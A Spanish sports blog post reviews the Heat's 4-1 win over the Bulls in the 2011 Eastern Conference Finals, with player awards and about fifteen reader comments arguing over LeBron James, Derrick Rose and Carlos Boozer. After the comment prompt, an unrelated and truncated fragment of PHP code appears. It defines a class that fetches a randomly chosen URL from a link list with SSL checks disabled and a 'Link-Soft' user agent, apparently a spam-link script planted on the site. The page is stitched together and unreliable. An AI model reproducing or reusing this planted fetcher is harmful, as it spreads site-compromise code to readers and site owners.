Final Este: Bulls 1 – Heat 4

30 de May de 2011 por TheDeerHunter

Cuatro victorias consecutivas tras una dura derrota. Así es como los Heat alcanzaron su mayor logro en el año 2006 y así es como vuelven a la final tan sólo un lustro más tarde.

Los Bulls, el mejor equipo de la regular, no han sido rival para el megalómano Big Three de Miami. Los grandes momentos son para los grandes jugadores y este axioma deja en evidencia a alguno de los pilares de Chicago. Les hemos visto entre superados y bisoños. Una sensación de que esta final de conferencia les ha venido grande. Tampoco nos han deslumbrado en apenas ningún momento de esta postemporada.

En cambio, para los Heat este enfrentamiento supone alcanzar la madurez plena como equipo. Tocaron suelo en el incidente de los llantos en el vestuario tras la tercera derrota contra los Bulls. En ese momento nadie se hubiera jugado el sueldo porque pudieran superarles. Tras haber dejado en el camino una discreta versión de Sixers y Celtics, con este triunfo despejan de una tacada cualquier atisbo de duda. Esa supuesta incapacidad para decidir en los momentos críticos, su teoríca falta de fortaleza interior o la escasa profundidad del banco. Entre este momento y aquel último gran fracaso en la regular han dejado de ser niños y se han convertido en hombres. Parecen plenamente preparados para afrontar el definitivo reto.

En la previa cometimos el, a lo sumo, penúltimo error en nuestras previsiones este curso. Finalmente no ha habido “merienda bajo tableros” como apostábamos. Miami ha conseguido disminuir un déficit de más de 10 rebotes de sus enfrentamientos particulares en la regular a apenas 4 y este es el eje de cualquier lectura. El rendimiento de Noah, tras volver de su lesión, ha sido malo y en concreto esta serie ha sido pésimo. Boozer ha tenido buenas actuaciones pero se ha dejado comer la tostada por Chris Bosh. La utilización de Gibson ha sido irregular y confusa, mientras que Haslem y Mike Miller se han destapado como recursos de primer orden precisamente ahora. Los Bulls se han colapsado ofensivamente. Fracasado el juego colectivo, Rose ha abusado de si mismo con resultados poco eficientes. Tanto Chalmers como Bibby le han llegado a defender dignamente, pero ha sido LeBron quien le ha puesto la puntilla. Ante él el MVP de este año no ha podido más que hincar la rodilla. The King is The King, aunque el premio individual se lo hayan dado al otro.

PREMIOS

MVP: Si en la otra final de conferencia se comparaba a Dirk con Bird en esta hay quien compara a LeBron James con el mismísimo Jordan. Los números de por si impresionantes (26 puntos, casi 8 rebotes, casi 7 asistencias, 2 rebotes y medio y 2 tapones) se unen una altísima eficacia en todos los tiros, una capacidad de decisión demoledora y una defensa capaz de hacerle de noche al MVP.

Sorpresa: Varias positivas para Miami. Chris Bosh ha pasado a Wade como espada nº 2 del equipo en esta serie y no se ha dejado intimidar por el teórico mejor juego interior del Este. Y al principio del año podría no haber sido sorpresa, pero las actuaciones de Udonis Haslem y Mike Miller han marcado la diferencia.

Decepción: 6 puntos con un 30% es extremadamente poco para uno de los mejores centers de la conferencia. Si a Pau le pusimos a caldo por su actuación ¿qué deberíamos decir de Joakim Noah?

Esfuerzo en vano: Como decimos, Derrick Rose ha sido demasiado para si mismo. Se ha esforzado por encima de sus posibilidades. 24 tiros por partido con un 35% de acierto. ¡Iverson ha vuelto!

Comenta

15 comentarios a esta entrada

  1. ralage dice:
    #1

    Creéis que este resultado evidencia el triunfo del modelo Big-three/Acumulación de superestrellas frente al de un EQUIPO?
    Por que creo q es dificil hacer uno mas compensado que estos Bulls y aún así ….

      Citar

  2. HisRoyalAirness dice:
    #2

    Yo creo que los Bulls tienen una gran plantilla pero un equipo mediocre, al contrario que los Bulls. Hace tiempo alguien decía que ningún equipo ha ganado un anillo sin, al menos, 2 All-Star entre sus filas. Veo multitud de jugadores buenos y aseados (carne de RS) pero sólo uno que marque la diferencia, y eso en playoffs ya sabemos que es determinante.
    Partiendo de la base de que Lebron es uno de los mejores de la liga de lejos, creo que se está sobrevalorando su actuación (que no deja de ser enorme); me explico:
    -Gran defensa a Rose en momentos clave. A Rose se lo han llegado a turnar Wade, Chalmers y Lebron en un mismo partido; si un tipo con el físico de Lebron te coge la marca en los últimos minutos, cuando no se ha desgastado en defensa individual en todo el partido, te saca 12 centímetros de altura y la inoperancia de tus compañeros te obliga a tirarte TODO no me parece nada legendario.
    -Jordan? Por favor, MJ se merendaba estas series promediando sobre 40 puntos miles de veces con un acierto altísimo y 6 asistencias y 6 rebotes. Y todo esto con UN solo All-Star al lado. Y su defensa de perímetro sobre jugadores de todas las formas y colores era escandalosa, personalmente de las mejores que he visto en mi vida. Michael en Playoffs era algo nunca visto, ni Kobe ni Lebron ni gaitas.
    -Creo que en esta serie se ha menospreciado a Wade, que a lo largo de PO ha anotado en los primeros tiempos como un animal y luego delegando. Apostaría por él como MVP de las finales si gana Miami.

    Espero que alguien comparta mi coñazo de opinión y no me crucifiqueis!! Se echaban de menos las entradas!

      Citar

  3. juan_sopale dice:
    #3

    Totalmente de acuerdo con HisRoyalAirness.

      Citar

  4. Txusma dice:
    #4

    Debate, debate!! 😀

    – Los Bulls tienen 2 All Stars. Uno es Rose y el otro es Boozer que lo fue en 2007 y 2008. Yo creo q el equipo de los Bulls es realmente bueno. Rose, Deng, Boozer y Noah parecen formar una columna vertebral al nivel de las más grandes pero claro el estado de forma en que ha llegado el juego interior de Chicago ha sido determinante. Noah no parece haberse acabado de recuperar de aquella lesión que le mantuvo tanto tiempo apartado y Boozer tampoco ha acabado de estar toda la temporada. Si el año q viene no tienen problemas de lesiones deberían ser claves como lo han sido cuando no han tenido lesiones. Además el banco no es moco de pavo con Brewer (gran última temporada en Utah), Korver, Gibson o Asik. Tal vez faltaría un escolta titular más tirador que abriera la zona facilitando las penetraciones de Rose o el juego interior. OJ Mayo?

    – Y Sobre Lebron. Para mi compararlo con Jordan es una auténtica herejía. Con eso lo digo todo. Este Pippen debe estar resentido por algo.

      Citar

  5. jas dice:
    #5

    yo sigo confiando en el poder de un ekipo…. pero sta serie creo q el análisis es perfecto, lo q tendría q haber marcado la diferencia a favor de los bulls es el juego interior, y tanto boozer como noah creo q no han estado a la altura, no lo creo asi en el caso de taj gibson q si ha aportado minutos de calidad, y en ese caso a rose no le a kedado otra q hacer la guerra x su cuenta contra una defensa exterior muy potente, quizás debería haber intentado involucrar más a sus compañeros en los momentos decisivos. Creo que la estirpe de rose solo ha hecho q comenzar no olvidemos q este jugador sta creciendo y a pasos agigantados.

    Esta serie me parece la contraposición perfecta a la final de la otra conferencia donde si a triunfado el ekipo (aunke teniendo a un claro referente como nowitzki) frente a 2 all stars.

      Citar

  6. TheDeerHunter dice:
    #6

    El amigo Enes Kanter dice que tiene el juego de Pau, el tiro de Nowitzki y la fuerza de Howard… nada menos XD

      Citar

  7. Rompe dice:
    #7

    Pues ya está todo dicho, tenemos MVP para los próximos 10 años!

      Citar

  8. Javijaen dice:
    #8

    Bueno, ahí va mi comentario:
    Creo que se infravalora el juego de los Bulls. Lo cierto es que han hecho una grandísima eliminatoria especialmente para mí Rose, Noah y Deng. Boozer ha estad más irregular aunque el tercer partido fue el mejor de los toros y el quinto no fue nada malo. Además, el banquillo de los Bulls ha sido bastante bueno y Osik hasta su lesión, Gibson, Brewer, Watson, Korver… ha sido un banquillo de categoría, y cuando desaparecían unos aparecían otros.
    Entonces, ¿por qué han caido 1-4 contra Miami?
    – En los momentos clave no han sabido/podido administrar su ventaja algunas veces y rematar las remontadas en otra, especialmente en el último cuarto. A recordar el cuarto cuarto del segundo partido (2 puntos en los últimos siete minutos en casa), o el tiro en el cuarto para ganar el partido y evitar la prórroga.
    – Rosedependencia, que deberían haber desviado algunas veces con balones a Deng para el último tiro, ya que tal y como apuntan arriba, se turnan para marcar al base en Heat y Luol Deng no está marcado por Lebron al final.
    – Finalmente, el día en que Wade no estaba bien era Lebron y Bosh los buenos, si era Bosh el flojo los otros dos… y además Haslem y Miller hicieron dos partidos (creo que fueron el segundo y el cuarto respectivamente) de hombre fuerte… Sin embargo en Chicago hay cuatro hombres (Rose-Noah-Boozer-Deng) irregulares, y a veces coincidían todos juntos en su irregularidad (a destacar que Spoelstra sistemáticamente quita a Bosh en el primer cuarto

      Citar

  9. Javijaen dice:
    #9

    Perdón por dejarlo incompleto. Quería dar a entender que Spoelstra ha sabido manejar mejor los partidos que el amigo Tim. Acabando, Heat justos campeones del Este y Bulls jóvenes que pocas veces se han visto en estas (algunos sí, pero no la mayoría) y que el próximo año darán más guerra. No será el WWW pero el este al menos se está poniendo duro.

      Citar

  10. TheDeerHunter dice:
    #10

    Hombre Javi, grandísima eliminatoria…

    Rose ha pasado de un 45% en TC y un 33% triples en la regular (lanzando menos de 20) a un pobrísimo 35% en TC y un 23% en triples en esta serie, tirándose 25 mandarinas por noche. ¡Y ha sido el mejor!!

    Boozer ha caido un 10%, Noah más de un 20%… Deng es el único que se ha mantenido más o menos, pero tampoco.

    Y los secundarios han pasado de producir 35 puntos por partido y 15 o 16 rebotes a unos 25 y 6 o 7…dramático.

    Tras lo que habían mostrado en la regular no me parece que esto sea para estar orgullosos de como han caido. Para mí Boozer es uno de los grandes sospechosos habituales de esta liga, por cierto. Es de los primeros en abandonar cualquier barco que se hunde.

      Citar

  11. HisRoyalAirness dice:
    #11

    jajaja acabo de ver la estupidez de Kanter…menudo año rookie que le espera, por bocazas.

    A mí Boozer me parece un cazacontratos, un tipo que se vende como algo que no es. Defensivamente es limitadísimo y además es muy bajo para jugar en su puesto. Tiene un tiro de media distancia bastante decente, eso sí, como el equipo se esté jugando algo le quema más la pelotita que el propio fuego. De vez en cuando hace un partido en el que le da por coger rebotes pero qué más te da que un tío te coja un día 35 rebotes si los sucesivos partidos coge 4. Creo que los Bulls deberían empezar por largarle a él junto a algo apetecible y pescar a un interior All-Star de verdad, no Boozer (por serlo también lo fue Abdul-Rahim); es más, intentaría pescar en río revuelto como Lakers (Pau?) o dar 3 jugadores por Howard y así sí que la preparan.

      Citar

  12. arvydas dice:
    #12

    me estoy mojando con lo de Pau en los Bulls

      Citar

  13. Txusma dice:
    #13

    Calla, calla…

      Citar

  14. Blade Petrovic dice:
    #14

    Os leo todos los días pero no comento mucho por eso voy a aprovechar la ocasión para comentaros un par de cosillas:
    1Supongo que os habréis dado cuenta que laa final se jugara en los dos american airlines (cdenter,dallas, arena,miami)
    2Alguien ha visto more than a game?Yo si y me parece un documental muy interesante
    Saludos:Blade

      Citar

  15. HisRoyalAirness dice:
    #15

    Yo creo que molaría aunque creo que los Bulls con lo que tendrían que pagar se quedaría con Rose, Pau, Noah y ya…pero bueno, que tampoco está mal la cosa

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>